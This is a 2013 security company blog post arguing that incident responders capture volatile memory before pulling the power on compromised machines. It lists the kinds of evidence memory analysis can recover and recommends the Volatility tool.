May 09, 2013 - Posted by Jeremy Scott to
Memory is the new vogue and rightfully so. My Solutionary teammate, Susan Carter, recently posted a related blog. Ironically, we were both crafting our posts about the same time but I want to drive home the importance of capturing volatile data and performing memory analysis.
In the past, forensics examinations involving computer systems were always performed by immediately disconnecting any compromised or infected hosts from the network. This is done with a “hard shutdown” or what has become known as “pulling the plug” and immediately acquiring a forensics image acquisition of the hard drive. The rationale for doing this as the first step is to preserve the state of the hard disk.
Now, the first step in any incident response scenario should be capturing the volatile data at the onset. This has become critical to identifying the extent of the compromise or infection. In fact, in some cases, volatile memory analysis is the only way to identify the nature and extent of a compromise. This is because the contents in RAM are cleared when the computer is shutdown and all traces of the potential malicious code, any commands given, and data exfiltrated may no longer be available on disk.
I’m not going to go into detail about how volatile memory operates, but I do want to explain why it is important to acquire volatile memory as the first step, rather than following the “pulling the plug” technique of the past.
Performing memory analysis contributes significantly to any forensic examination and not just a malware infection. Memory analysis overcomes several limitations of traditional forensic analysis especially when encryption is involved. But most importantly, memory analysis overcomes the inability of the physical disk image to reveal information about processes that were running in memory at the time of compromise.
Some of the information that can be obtained from memory analysis are:
- Loaded DLLs
- Open files and registry handles
- Network information
- Passwords and cryptographic keys
- Unencrypted content
- Hidden data and files
- Malicious code
- Command line arguments
Volatile memory can store a great deal of information, but the problem is finding a tool that can properly parse the data that is contained in the memory image. There are a few tools out there but my favorite that I have used is a tool called Volatility.
Check out a previous post, Hunting Malware with Memory Analysis, for more information on the use of Volatility.
And, pull the network plug, not the power plug…
Read more on Solutionary Minds about: